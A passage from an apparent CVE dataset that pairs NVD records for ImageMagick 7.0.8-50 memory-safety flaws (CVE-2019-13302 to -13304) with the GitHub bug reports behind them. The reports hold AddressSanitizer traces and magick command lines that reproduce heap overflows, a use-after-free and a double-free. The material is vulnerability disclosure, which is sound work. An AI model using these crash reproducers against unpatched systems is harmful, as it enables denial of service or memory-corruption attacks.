__interceptor_posix_memalign (install/bin/magick+0x4f09b0) #1 0x5822fa in AcquireAlignedMemory MagickCore/memory.c:265:7 #2 0xb24539 in AcquireCacheNexusPixels MagickCore/cache.c:4968:37 #3 0xb0d587 in SetPixelCacheNexusPixels MagickCore/cache.c:5076:12 #4 0xb04b7c in GetVirtualPixelCacheNexus MagickCore/cache.c:2751:10 #5 0xb28621 in GetCacheViewVirtualPixels MagickCore/cache-view.c:664:10 #6 0xefd9e9 in .omp_outlined._debug__.69 MagickCore/resize.c:2542:7 #7 0xeff106 in .omp_outlined..70 MagickCore/resize.c:2488:3 #8 0x7f6383e13452 in __kmp_invoke_microtask (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x7c452) #9 0x7f6383dcd1b6 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x361b6) Thread T1 created by T0 here: #0 0x43fcd0 in pthread_create (install/bin/magick+0x43fcd0) #1 0x7f6383e09110 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x72110) Thread T2 created by T0 here: #0 0x43fcd0 in pthread_create (install/bin/magick+0x43fcd0) #1 0x7f6383e09110 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x72110) SUMMARY: AddressSanitizer: heap-use-after-free MagickCore/resize.c:2604:28 in .omp_outlined._debug__.69 ``` This is about the heap-buffer-overflow in .omp_outlined._debug__.69 MagickCore/resize.c:2604 ``` ==26841==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61d00001d670 at pc 0x000000efe4dc bp 0x7f78c5104e90 sp 0x7f78c5104e88 READ of size 4 at 0x61d00001d670 thread T1 #0 0xefe4db in .omp_outlined._debug__.69 MagickCore/resize.c:2604:28 #1 0xeff106 in .omp_outlined..70 MagickCore/resize.c:2488:3 #2 0x7f78cdc28452 in __kmp_invoke_microtask (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x7c452) #3 0x7f78cdbe21b6 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x361b6) #4 0x7f78cdbe0b20 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x34b20) #5 0x7f78cdc20417 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x74417) #6 0x7f78d025c6da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da) #7 0x7f78cd6c488e in clone (/lib/x86_64-linux-gnu/libc.so.6+0x12188e) Address 0x61d00001d670 is a wild pointer. SUMMARY: AddressSanitizer: heap-buffer-overflow MagickCore/resize.c:2604:28 in .omp_outlined._debug__.69 ``` This is about double-free bug in RelinquishAlignedMemory of MagickCore/memory.c:1037:3 ``` ==26601==ERROR: AddressSanitizer: attempting double-free on 0x61d00001fe80 in thread T1: #0 0x4ef768 in __interceptor_free (install/bin/magick+0x4ef768) #1 0x583e5c in RelinquishAlignedMemory MagickCore/memory.c:1037:3 #2 0xafe7c6 in RelinquishCacheNexusPixels MagickCore/cache.c:1089:12 #3 0xb0d5db in SetPixelCacheNexusPixels MagickCore/cache.c:5080:9 #4 0xb04b7c in GetVirtualPixelCacheNexus MagickCore/cache.c:2751:10 #5 0xb28621 in GetCacheViewVirtualPixels MagickCore/cache-view.c:664:10 #6 0xefd9e9 in .omp_outlined._debug__.69 MagickCore/resize.c:2542:7 #7 0xeff106 in .omp_outlined..70 MagickCore/resize.c:2488:3 #8 0x7fed18cb6452 in __kmp_invoke_microtask (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x7c452) #9 0x7fed18c701b6 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x361b6) #10 0x7fed18c6eb20 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x34b20) #11 0x7fed18cae417 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x74417) #12 0x7fed1b2ea6da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da) #13 0x7fed1875288e in clone (/lib/x86_64-linux-gnu/libc.so.6+0x12188e) 0x61d00001fe80 is located 0 bytes inside of 2240-byte region [0x61d00001fe80,0x61d000020740) freed by thread T2 here: #0 0x4ef768 in __interceptor_free (install/bin/magick+0x4ef768) #1 0x583e5c in RelinquishAlignedMemory MagickCore/memory.c:1037:3 #2 0xafe7c6 in RelinquishCacheNexusPixels MagickCore/cache.c:1089:12 #3 0xb0d5db in SetPixelCacheNexusPixels MagickCore/cache.c:5080:9 #4 0xb04b7c in GetVirtualPixelCacheNexus MagickCore/cache.c:2751:10 #5 0xb28621 in GetCacheViewVirtualPixels MagickCore/cache-view.c:664:10 #6 0xefd9e9 in .omp_outlined._debug__.69 MagickCore/resize.c:2542:7 #7 0xeff106 in .omp_outlined..70 MagickCore/resize.c:2488:3 #8 0x7fed18cb6452 in __kmp_invoke_microtask (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x7c452) #9 0x7fed18c701b6 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x361b6) previously allocated by thread T1 here: #0 0x4f09b0 in __interceptor_posix_memalign (install/bin/magick+0x4f09b0) #1 0x5822fa in AcquireAlignedMemory MagickCore/memory.c:265:7 #2 0xb24539 in AcquireCacheNexusPixels MagickCore/cache.c:4968:37 #3 0xb0d587 in SetPixelCacheNexusPixels MagickCore/cache.c:5076:12 #4 0xb04b7c in GetVirtualPixelCacheNexus MagickCore/cache.c:2751:10 #5 0xb28621 in GetCacheViewVirtualPixels MagickCore/cache-view.c:664:10 #6 0xefd9e9 in .omp_outlined._debug__.69 MagickCore/resize.c:2542:7 #7 0xeff106 in .omp_outlined..70 MagickCore/resize.c:2488:3 #8 0x7fed18cb6452 in __kmp_invoke_microtask (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x7c452) #9 0x7fed18c701b6 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x361b6) Thread T1 created by T0 here: #0 0x43fcd0 in pthread_create (install/bin/magick+0x43fcd0) #1 0x7fed18cac110 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x72110) Thread T2 created by T0 here: #0 0x43fcd0 in pthread_create (install/bin/magick+0x43fcd0) #1 0x7fed18cac110 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x72110) SUMMARY: AddressSanitizer: double-free (install/bin/magick+0x4ef768) in __interceptor_free ==26601==ABORTING ``` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: Version: ImageMagick 7.0.8-50 Q16 x86_64 2019-06-10 - Environment (Operating system, version and so on): Description: Ubuntu 18.04.1 LTS Release: 18.04 Codename: bionic - Additional information: CC=clang-7 CXX=clang++-7 <!-- Thanks for reporting the issue to ImageMagick! -->
heap-use-after-free in MagickCore/resize.c and double-free in RelinquishAlignedMemory of MagickCore/memory.c
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1589/comments
11
2019-06-11T05:31:32Z
2019-07-09T13:21:32Z
https://github.com/ImageMagick/ImageMagick/issues/1589
454,487,713
1,589
492
CVE-2019-13302
2019-07-05T01:15:10.373
ImageMagick 7.0.8-50 Q16 has a heap-based buffer over-read in MagickCore/fourier.c in ComplexImages.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/d5089971bd792311aaab5cb73460326d7ef7f32d" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1597" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/d5089971bd792311aaab5cb73460326d7ef7f32d" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1597" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*", "matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/ImageMagick/ImageMagick/issues/1597
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There's a heap-buffer-overflow in MagickCore/fourier.c:305:45 in ComplexImages. ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> run_cmd: `magick -seed 0 -treedepth 71 "(" magick:logo +repage ")" "(" magick:granite -white-threshold 0% -cycle 256 -lat 815 ")" -bordercolor rgb"("101,151,20")" -blue-primary 638,241 -print "0O." -complex multiply tmp ` Second one also can trigger. cmd: `magick -seed 0 "(" magick:logo +repage ")" "(" magick:logo +repage ")" -render -size 2872 -complex multiply -quiet tmp ` Here's ASAN result. ``` ==16842==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61e000000a80 at pc 0x7fea5bb0c52f bp 0x7fff5c11c590 sp 0x7fff5c11c588 READ of size 4 at 0x61e000000a80 thread T0 #0 0x7fea5bb0c52e in ComplexImages MagickCore/fourier.c:305:45 #1 0x7fea5b3328c1 in CLIListOperatorImages MagickWand/operation.c:3890:22 #2 0x7fea5b33e34e in CLIOption MagickWand/operation.c:5276:14 #3 0x7fea5b17fa99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #4 0x7fea5b180d0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #5 0x7fea5b1caba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #6 0x526f95 in MagickMain utilities/magick.c:149:10 #7 0x5268e1 in main utilities/magick.c:180:10 #8 0x7fea55c41b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 #9 0x41b069 in _start (install/bin/magick+0x41b069) 0x61e000000a80 is located 0 bytes to the right of 2560-byte region [0x61e000000080,0x61e000000a80) allocated by thread T0 here: #0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200) #1 0x7fea5bbb9666 in AcquireAlignedMemory MagickCore/memory.c:265:7 #2 0x7fea5b910d5c in AcquireCacheNexusPixels MagickCore/cache.c:4968:37 #3 0x7fea5b8fe1c4 in SetPixelCacheNexusPixels MagickCore/cache.c:5076:12 #4 0x7fea5b8f5b05 in GetVirtualPixelCacheNexus MagickCore/cache.c:2751:10 #5 0x7fea5b913f36 in GetCacheViewVirtualPixels MagickCore/cache-view.c:664:10 #6 0x7fea5bb0ae5d in ComplexImages MagickCore/fourier.c:250:8 #7 0x7fea5b3328c1 in CLIListOperatorImages MagickWand/operation.c:3890:22 #8 0x7fea5b33e34e in CLIOption MagickWand/operation.c:5276:14 #9 0x7fea5b17fa99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #10 0x7fea5b180d0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #11 0x7fea5b1caba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #12 0x526f95 in MagickMain utilities/magick.c:149:10 #13 0x5268e1 in main utilities/magick.c:180:10 #14 0x7fea55c41b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-buffer-overflow MagickCore/fourier.c:305:45 in ComplexImages ``` Here's the ASAN result for second cmd ``` ==16863==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f2a0831b800 at pc 0x7f2a1747e649 bp 0x7ffd7c094350 sp 0x7ffd7c094348 WRITE of size 4 at 0x7f2a0831b800 thread T0 #0 0x7f2a1747e648 in ComplexImages MagickCore/fourier.c:305:18 #1 0x7f2a16ca48c1 in CLIListOperatorImages MagickWand/operation.c:3890:22 #2 0x7f2a16cb034e in CLIOption MagickWand/operation.c:5276:14 #3 0x7f2a16af1a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #4 0x7f2a16af2d0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #5 0x7f2a16b3cba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #6 0x526f95 in MagickMain utilities/magick.c:149:10 #7 0x5268e1 in main utilities/magick.c:180:10 #8 0x7f2a115b3b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 #9 0x41b069 in _start (install/bin/magick+0x41b069) 0x7f2a0831b800 is located 0 bytes to the right of 3686400-byte region [0x7f2a07f97800,0x7f2a0831b800) allocated by thread T0 here: #0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200) #1 0x7f2a1752b666 in AcquireAlignedMemory MagickCore/memory.c:265:7 #2 0x7f2a172746ac in OpenPixelCache MagickCore/cache.c:3728:46 #3 0x7f2a1727a991 in GetImagePixelCache MagickCore/cache.c:1754:18 #4 0x7f2a17280c59 in SyncImagePixelCache MagickCore/cache.c:5494:28 #5 0x7f2a174defc1 in SetImageStorageClass MagickCore/image.c:2627:10 #6 0x7f2a1747c4f7 in ComplexImages MagickCore/fourier.c:185:7 #7 0x7f2a16ca48c1 in CLIListOperatorImages MagickWand/operation.c:3890:22 #8 0x7f2a16cb034e in CLIOption MagickWand/operation.c:5276:14 #9 0x7f2a16af1a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #10 0x7f2a16af2d0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #11 0x7f2a16b3cba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #12 0x526f95 in MagickMain utilities/magick.c:149:10 #13 0x5268e1 in main utilities/magick.c:180:10 #14 0x7f2a115b3b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-buffer-overflow MagickCore/fourier.c:305:18 in ComplexImages ``` Thanks. ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: Version: ImageMagick 7.0.8-50 Q16 x86_64 2019-06-17 https://imagemagick.org - Environment (Operating system, version and so on): Description: Ubuntu 18.04.1 LTS Release: 18.04 Codename: bionic - Additional information: CC=clang-7 CXX=clang++-7 ./configure --disable-openmp <!-- Thanks for reporting the issue to ImageMagick! -->
heap-buffer-overflow in MagickCore/fourier.c:305:45 in ComplexImages
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1597/comments
2
2019-06-17T03:51:17Z
2019-07-08T01:50:56Z
https://github.com/ImageMagick/ImageMagick/issues/1597
456,730,033
1,597
493
CVE-2019-13303
2019-07-05T01:15:10.437
ImageMagick 7.0.8-50 Q16 has a heap-based buffer over-read in MagickCore/composite.c in CompositeImage.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/d29148fae06c01ef215940e084cf41853c117bab" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1603" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/d29148fae06c01ef215940e084cf41853c117bab" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1603" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*", "matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/ImageMagick/ImageMagick/issues/1603
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There's a heap-buffer-overflow in MagickCore/composite.c:666:45 in CompositeImage. I compiled ImageMagick with --disable-openmp option. ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> run_cmd: `magick -seed 0 -sampling-factor 3.307x3.198 "(" magick:granite +repage ")" "(" magick:rose +repage ")" "(" magick:rose +repage ")" -encoding AdobeStandard -extract 285x52^-70-70 -region 75x310-64-51 -evaluate-sequence Min -layers compare-overlay tmp` and run this cmd: `magick -seed 0 "(" magick:logo -region 306%-74-69 -lat 886 ")" "(" magick:netscape -level 64 ")" "(" magick:granite -opaque rgb"("12,57,57")" -modulate 94,59,3 -frame 4%-82+23 ")" -comment "B>%C%o" -style Any -layers compare-any tmp` Here's ASAN result. ``` ==5479==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x626000008900 at pc 0x7f9c528f0e7d bp 0x7ffd8cc41710 sp 0x7ffd8cc41708 READ of size 4 at 0x626000008900 thread T0 #0 0x7f9c528f0e7c in CompositeImage MagickCore/composite.c:666:45 #1 0x7f9c52b23aa0 in CompareImagesLayers MagickCore/layer.c:792:10 #2 0x7f9c522d035c in CLIListOperatorImages MagickWand/operation.c:4199:26 #3 0x7f9c522d934e in CLIOption MagickWand/operation.c:5276:14 #4 0x7f9c5211aa99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #5 0x7f9c5211bd0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #6 0x7f9c52165ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #7 0x526f95 in MagickMain utilities/magick.c:149:10 #8 0x5268e1 in main utilities/magick.c:180:10 #9 0x7f9c4cbdcb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #10 0x41b069 in _start (install/bin/magick+0x41b069) 0x626000008900 is located 0 bytes to the right of 10240-byte region [0x626000006100,0x626000008900) allocated by thread T0 here: #0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200) #1 0x7f9c52b54f66 in AcquireAlignedMemory MagickCore/memory.c:265:7 #2 0x7f9c528abd5c in AcquireCacheNexusPixels MagickCore/cache.c:4968:37 #3 0x7f9c528991c4 in SetPixelCacheNexusPixels MagickCore/cache.c:5076:12 #4 0x7f9c52890b05 in GetVirtualPixelCacheNexus MagickCore/cache.c:2751:10 #5 0x7f9c528aef36 in GetCacheViewVirtualPixels MagickCore/cache-view.c:664:10 #6 0x7f9c528f0bae in CompositeImage MagickCore/composite.c:637:11 #7 0x7f9c52b23aa0 in CompareImagesLayers MagickCore/layer.c:792:10 #8 0x7f9c522d035c in CLIListOperatorImages MagickWand/operation.c:4199:26 #9 0x7f9c522d934e in CLIOption MagickWand/operation.c:5276:14 #10 0x7f9c5211aa99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #11 0x7f9c5211bd0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #12 0x7f9c52165ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #13 0x526f95 in MagickMain utilities/magick.c:149:10 #14 0x5268e1 in main utilities/magick.c:180:10 #15 0x7f9c4cbdcb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) SUMMARY: AddressSanitizer: heap-buffer-overflow MagickCore/composite.c:666:45 in CompositeImage ``` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: Version: ImageMagick 7.0.8-50 Q16 x86_64 2019-06-18 https://imagemagick.org - Environment (Operating system, version and so on): Description: Ubuntu 18.04.1 LTS Release: 18.04 Codename: bionic - Additional information: CC=clang-7 CXX=clang++-7 ./configure --disable-openmp <!-- Thanks for reporting the issue to ImageMagick! -->
heap-buffer-overflow in MagickCore/composite.c:666:45 in CompositeImage
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1603/comments
2
2019-06-18T17:08:25Z
2019-07-08T01:51:18Z
https://github.com/ImageMagick/ImageMagick/issues/1603
457,598,033
1,603
494
CVE-2019-13304
2019-07-05T01:15:10.500
ImageMagick 7.0.8-50 Q16 has a stack-based buffer overflow at coders/pnm.c in WritePNMImage because of a misplaced assignment.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/7689875ef64f34141e7292f6945efdf0530b4a5e" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1614" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/bfa3b9610c83227894c92b0d312ad327fceb6241" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2019/08/msg00021.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4715" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/7689875ef64f34141e7292f6945efdf0530b4a5e" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1614" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/bfa3b9610c83227894c92b0d312ad327fceb6241" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2019/08/msg00021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4715" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*", "matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": 